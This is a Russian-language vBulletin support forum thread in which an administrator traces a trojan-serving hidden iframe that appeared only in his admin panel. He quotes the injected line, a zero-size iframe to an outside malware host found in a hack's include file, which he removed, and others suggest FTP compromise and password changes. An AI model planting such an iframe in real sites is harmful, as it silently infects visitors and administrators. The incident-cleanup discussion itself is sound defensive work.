VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
В названии темы, возможно, не совсем верно сформулировал, в общем не троянец ливанули, а ифрейм с трояном повесили, но не на все страницы, а только ко мне в админку:
Quote:
Так вот, я полностью удалил папку админки, залил чистые файлы - это не помогло.
Тогда я решил поискать в бд форум, может в шаблонах или в модулях спрятали - безрезультатно:
Quote:
Вопрос на засыпку, как он туда попал, если в файлах админки и в бд его нету..? Я сначала думал, что где-то в глобали в каком-то, но ведь тогда бы троян висел везде, а не только в админке.
А модули разве не хранятся в бд? Наверное бы поиск нашел в бд, если было бы в модулях, могу ошибаться.
AleX
Гость
Posts: n/a
KapriZz, смотрите index файлы и хтакссццес.
@KapriZz
Знаток
Join Date: Sep 2007
Posts: 730
Версия vB: 3.8.3
Reputation:
Knowing 171
Репутация в разделе: 41
0
AleX,
Quote:
<FilesMatch "\.php$">
Order Deny,Allow
Deny from all
Allow from 78.153.157.169
</FilesMatch>
Это аццесс в админке лежащий..
В корне тоже чистый лежит. (Имеется ввиду с тем, что мне нужно, без троянцев..)
Помогите :(
@KapriZz
Знаток
Join Date: Sep 2007
Posts: 730
Версия vB: 3.8.3
Reputation:
Knowing 171
Репутация в разделе: 41
0
Нашел я его сегодня, совершенно случайно, в админке одна из функций указала, что не может работать, так как в 1 из файлов ошибки, залез я в тот файл, includes/vS_HHR_Engine.php и там удалил строчку:
print('<iframe src="http://spl1.tk/free/index.php" width="0" height="0" frameborder="0"></iframe>');
При чем это инклуд хайд-хака, непонятно, как его изменили, ведь стояли права 444, а сейчас 644.. (
@shar
Простоузер
Join Date: Jul 2009
Posts: 21
Версия vB: 4.1.x
Reputation:
Novice 1
Репутация в разделе: 0
0
Quote:
Originally Posted by KapriZz
непонятно, как его изменили, ведь стояли права 444, а сейчас 644
ftp. лучше поменять пароли.
даже если и не через фтп залили файл с фреймом, то все равно лучше поменять.
@KapriZz
Знаток
Join Date: Sep 2007
Posts: 730
Версия vB: 3.8.3
Reputation:
Knowing 171
Репутация в разделе: 41
0
shar,
Фтп закрыто по IP, как и админка, допускаю только XSS инъекции, но подобное не позволяет заливать файлы, менять chmod, редактировать файлы с 444 правами, поэтому и удивился.
@shar
Простоузер
Join Date: Jul 2009
Posts: 21
Версия vB: 4.1.x
Reputation:
Novice 1
Репутация в разделе: 0
0
Quote:
Originally Posted by KapriZz
подобное не позволяет заливать файлы, менять chmod, редактировать файлы с 444 правами, поэтому и удивился.
именно поэтому и остается только фтп
правда, я слышал, если постучать в бубен, то некоторым удается менять права на запись силой мысли
@Лисёнок
Простоузер
Join Date: Dec 2005
Posts: 5
Версия vB: 3.8.x
Пол:
Reputation:
Novice 0
Репутация в разделе: 0
0
KapriZz, вполне реально у хостера кроссайт скриптинг, проверь - залей remview и посмотри.
Через что ливанули троянец?
